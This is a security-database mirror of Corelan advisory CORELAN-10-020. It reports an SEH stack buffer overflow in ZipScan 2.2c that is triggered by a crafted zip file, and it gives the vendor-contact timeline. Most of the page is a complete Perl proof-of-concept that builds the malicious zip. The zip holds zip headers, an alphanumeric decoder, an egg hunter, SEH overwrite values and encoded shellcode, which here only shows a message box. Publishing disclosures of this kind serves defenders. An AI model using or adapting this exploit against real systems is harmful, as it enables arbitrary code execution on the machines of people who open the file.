Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormCorelanc0d3rPACKETSTORM:88056
HistoryApr 06, 2010 - 12:00 a.m.

ZipScan 2.2c Buffer Overflow

2010-04-0600:00:00
corelanc0d3r
packetstormsecurity.com
16
JSON
`  
|------------------------------------------------------------------|  
| __ __ |  
| _________ ________ / /___ _____ / /____ ____ _____ ___ |  
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |  
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |  
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |  
| |  
| http://www.corelan.be:8800 |  
| [email protected] |  
| |   
|-------------------------------------------------[ EIP Hunters ]--|  
| |  
| Vulnerability Disclosure Report |  
| |  
|------------------------------------------------------------------|  
  
Advisory : CORELAN-10-020  
Disclosure date : April 3rd, 2010  
http://www.corelan.be:8800/advisories.php?id=CORELAN-10-020  
  
  
00 : Vulnerability information  
-------------------------------------  
Product : ZipScan 2.2c  
Version : 2.2c (latest version)  
Vendor : [email protected] / http://www.zipscan.co.uk/  
URL : http://www.zipscan.co.uk/download.htm  
Platform : Windows  
Type of vulnerability : Stack overflow  
Risk rating : medium  
Issue fixed in version : not fixed  
Vulnerability discovered by : Lincoln  
Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/  
  
  
01 : Vendor description of software  
-------------------------------------  
>From the vendor website:  
"ZipScan searches archive files. It can search Zip, CAB, RAR, ACE,  
InstallShield CAB, JAR, TAR, GZIP, Z, ZOO, LZH, ARJ, CHM and  
OpenOffice files, including password-protected, nested and  
self-extracting archives. The program supports text searching and can  
open and extract files."  
  
02 : Vulnerability details  
-------------------------------------  
When a specially crafted zip file is opened from within ZipScan,  
an exception handler gets overwritten, allowing to trigger arbitrary  
code execution.   
The way to trigger the vulnerability :  
  
- open the zip file from within ZipScan : "File - Open Archive File"  
Or  
- Click "open archive file and view its contents"  
- double-click on the filename inside the zip file  
  
  
03 : Author/Vendor communication  
-------------------------------------  
March 23 2010 : author contacted  
March 20 2010 : sent reminder  
April 3 2010 : No response, public disclosure  
  
  
04 : PoC  
----------  
#!/usr/bin/perl  
# Software : ZipScan 2.2c (.zip)  
# Bug found by : Lincoln  
# Author : Lincoln & corelanc0d3r  
# OS : Windows  
# Tested on : XP SP3 En (VirtualBox)  
# Type of vuln : SEH  
# Greetz to : Corelan Security Team  
# http://www.corelan.be:8800/index.php/security/corelan-team-members/  
#  
# Script provided 'as is', without any warranty.  
# Use for educational purposes only.  
# Do not use this code to do anything illegal !  
#  
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.  
#  
#  
# Code :  
print "|------------------------------------------------------------------|\n";  
print "| __ __ |\n";  
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";  
print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";  
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";  
print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n";  
print "| |\n";  
print "| http://www.corelan.be:8800 |\n";  
print "| |\n";  
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";  
print "[+] Exploit for ZipScan 2.2c \n";  
  
  
  
my $filename="zipscan.zip";  
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .  
"\x00\x00\x00\x00\x00\x00\x00\x00" .  
"\x88\x13" .# file size: 5k  
"\x00\x00\x00";  
  
my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .  
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".  
"\x88\x13". # file size: 5k  
"\x00\x00\x00\x00\x00\x00\x01\x00".  
"\x24\x00\x00\x00\x00\x00\x00\x00";  
  
my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".  
"\xb6\x13\x00\x00". # +46  
"\xa6\x13\x00\x00". # +30  
"\x00\x00";  
  
my $decoder =  
#pop edx pop esp  
"\x5b\x5b\x5b\x5b\x5c".  
  
#jmp ebp  
"\x25\x4A\x4D\x4E\x55".  
"\x25\x35\x32\x31\x2A".  
"\x2d\x55\x55\x55\x64".  
"\x2d\x55\x55\x55\x64".  
"\x2d\x56\x55\x56\x51".  
"\x50".  
  
#add ebp, 526h  
"\x25\x4A\x4D\x4E\x55".  
"\x25\x35\x32\x31\x2A".  
"\x2d\x35\x69\x48\x54".  
"\x2d\x25\x69\x48\x54".  
"\x2d\x25\x68\x48\x52".  
"\x50".  
  
#jmp back to decoded op code  
"\x7a\xb5";  
  
#basereg ebp, modified egg hunter mov edx,ebp  
#points egg hunter to unmodified shellcode  
my $egg =  
"UYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0".  
"BBABXP8ABuJIOyJB2bPRPjs2shZmfNwLWuSj44ho".  
"nXRWdpVPqdNkXznOrUZJNO45jGKOxgA";  
  
#msg box "Exploited by Corelan Security Team"  
#encoded with Alpha2 base reg edi  
my $shellcode =  
"w00tw00t".  
"WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0B".  
"BABXP8ABuJIoy8c9JkgXYt3jTsiQYg9syQYqYbiRiW".  
"9g9QYBiCsrc0CqSssssvW3aqJqzQQV8BpVPqQ4p712".  
"KQQsqv1drBabbP2QRcrTprbw2RaSrpXrpTx2a72RU0".  
"JCyPJrYSzpKPMrkRk59V1qtSuptQZaD75QqRnP2Rnb".  
"rBbQJQVPQ3yV9pBaTPN2Ksa3Q74bPBl0KQSw6BdPLP".  
"NBK3rsfqW0lrlpKBqQFQTpHBlRkpQPnbeppBn2Ksua".  
"vrpWHRpBoswQxPPPuPLTsBpRy1UPQPKQq0KropH51p".  
"QRPPL2kPPPlQVrd0E44pL2kCaruqWpLBlpKpPcd0Cd".  
"uPPRXPCFQpKaJ0LPK2b2JpGSXPNRKw3BJW7Rpsucar".  
"jpKQX53QVf7bpw9BnbKW4PtBlRkw5pQQZ0NBd410I0".  
"orpDqBkppbkPLBnblpOSDPKRPQSpDqV0jaZCQrjBOq".  
"T0M3wqarkSGcxPi3zPQrkPOPIrOG9ROSurKpCrlqUS".  
"D3aUhrqau1Yrn0NPkpB1jsu0tRerq0JpKssqF2nBK3".  
"vPlSr2K2lpKssSZPEpLPC6QSzbkPNPkW5qDRnRKqW4".  
"1RmwHRosISabtcv74rgbLG5fQBj2C0Og2QT1XbfBiW".  
"8sdpOpy2kQEpMv9CyrrpPbHpLpN0PRnQTpN3xRLRp2".  
"rpKrxpM2lpKBoqYpoPKPO2oQiv1seG6QtpMpkF1PnS".  
"yQX0MtrpQrC2lpGsu0LPD54sag2pMtxPNBKw9ROBiR".  
"OPK0OPLRiqRsUQWBXG32x1RPL2pPl0EPppKpOrqPxQ".  
"Ww3Suu2sv2nreVT3u4xV1REPQqspEp50D6RRmChV1p".  
"LaT2D2dczBlSyaXcVQSbFpKroSsqu3v3TblCy2k0rp".  
"PpPpMbKPN78rlarv0pMpMplpNpgQWpl3w2t2fVRpKs".  
"hpC2NpIPoPIpoRiPoCraXPQrTqURQpQpHpEPp73PXQ".  
"T4pQS77aRRnw2G5CtPq0K0kPKGHqSplSuBTaVu6pK0".  
"9QXRCpE6X2p51G2PMv0shG5Pprqt8QRsiqUbPRpSdp".  
"QRUbqrXQTVU1S3rrpPiPQU4PCv8savPQS2Cg5Ue3sC".  
"cV1t8qRW5PBPL0PsQRp0nrbcxpQDpSaPSRp2OPPRRQ".  
"UUhpCpTv1dpbp2B73W9PQPx3rpOpCQIsr2tBppeF1b".  
"XSrpepQu872pPV0BLW6saQXCyRnaxBpPLbf74PEPr0".  
"MCi0IBQqTt1pJprqSrBCsSSRp0QQVp2pKRo1X0PRpt".  
"qpOVPPF6PbkPObqPECtsxSuRzQQ1QA";  
  
#Filler  
my $mjunk = "A" x 30;  
  
# --- payload --- 5k total  
my $junk = "A" x 22 . $egg . "A" x 3427;  
my $nseh="\x7a\x06\x41\x41";  
my $seh="\x16\x09\x01\x10"; #universal  
my $payload = $junk.$nseh.$seh.$decoder.$shellcode.$mjunk;  
$payload = $payload . ".txt";  
  
print "[+] Size : " . length($payload)."\n";  
system("del $filename");  
print "[+] Creating new vulnerable file: $filename\n\n";  
open(FILE, ">$filename");  
print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;  
close(FILE);  
`
JSON